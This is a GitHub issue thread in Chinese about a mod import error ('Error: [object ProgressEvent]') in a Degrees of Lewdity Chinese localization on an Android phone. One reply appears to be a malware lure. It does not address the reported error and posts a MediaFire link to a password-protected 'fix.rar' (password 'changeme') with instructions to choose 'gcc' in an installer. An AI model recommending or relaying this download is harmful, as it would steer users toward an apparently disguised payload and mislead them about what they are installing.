### ISSUE TITLE
无法正常导入模组

### ISSUE THREAD

**Issue by Gionaqiaonai** [Eltirosto/Degrees-of-Lewdity-Chinese-Localization#417]
### 在提问之前...

- [X] 我填写了简短且清晰明确的标题，以便开发者在翻阅 issue 列表时能快速确定大致问题。而不是“一个建议”、“卡住了”等
- [X] 我确定这既不是对游戏报错的反馈，也不是对汉化文本改进的建议

### 说说你遇到的问题？

![Screenshot_20240826_190520](https://github.com/user-attachments/assets/59511077-5547-4181-a4b8-9ced4494f683)
我能确保我所使用的游戏版本是最新的，模组也是最新的。并且polyfill文件和普通的我都试过了，无论是ModI18N.mod.zip还是GameOriginalImagePack.mod.zip这两个文件在导入进去之后的结果都是如此，显示Error: [object ProgressEvent]而非Success.刷新页面后生效。想来问问看有没有解决办法😢
顺便一提如果需要知道的话，我的设备是vivo Y51s

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Gionaqiaonai** [comment]
不好意思我不小心重复多发了一个不用管这个issue
